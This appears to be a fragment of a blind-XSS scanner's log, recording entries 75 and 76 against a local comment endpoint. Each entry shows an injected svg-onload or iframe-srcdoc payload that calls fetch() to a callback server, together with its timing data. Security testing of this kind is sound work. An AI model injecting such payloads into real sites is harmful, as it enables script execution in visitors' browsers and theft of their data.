    User-Agent: python-requests/2.32.5...
    UUID: 12a0ec9f-afaa-4d68-9621-c66e432f8f1a

[75] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><svg onload=fetch("http://127.0.0.1:5000/c/0abf3e95-8f80-45d6-802c-47c50828501...
    Injection Time: 2025-12-17T11:36:13.583534
    Callback Time: 2025-12-17T11:36:13.936795
    Delay: 0.35s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 0abf3e95-8f80-45d6-802c-47c508285014

[76] http://127.0.0.1:8000/comment?text=hello
    Parameter: text
    Payload: "><iframe srcdoc="<script>fetch('http://127.0.0.1:5000/c/3cac3f9c-76a1-4023-940f...
    Injection Time: 2025-12-17T11:36:13.590809
    Callback Time: 2025-12-17T11:36:13.941065
    Delay: 0.35s
    Source IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 3cac3f9c-76a1-4023-940f-e9e1c28b211c

